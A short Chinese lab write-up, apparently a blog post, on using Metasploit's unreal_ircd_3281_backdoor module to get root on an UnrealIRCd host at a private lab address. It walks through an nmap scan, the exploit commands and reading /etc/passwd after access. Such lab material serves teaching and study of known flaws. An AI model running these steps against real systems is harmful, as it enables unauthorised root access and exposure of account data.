MSF 溢出UnrealIRCd后门漏洞

2018-01-21  本文已影响0人  唯师默蓝

一、实验目的:利用UnrealIRCd后门漏洞,获取目标主机的root权限
二、某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能执行任意代码。
三、实验步骤:

  1. nmap -sV 192.168.1.3,对目标主机进行端口扫描,发现开放6667端口,对应服务为unreal ircd。
  2. 打开msf -> search unreal ircd -> use exploit/unix/irc/unreal_ircd_3281_backdoor ->show options -> set RHOST 192.168.1.3 -> exploit
  3. 进入目标主机,whoami -> 查看权限 -> cat /etc/passwd,查看密码。
上一篇下一篇

猜你喜欢

热点阅读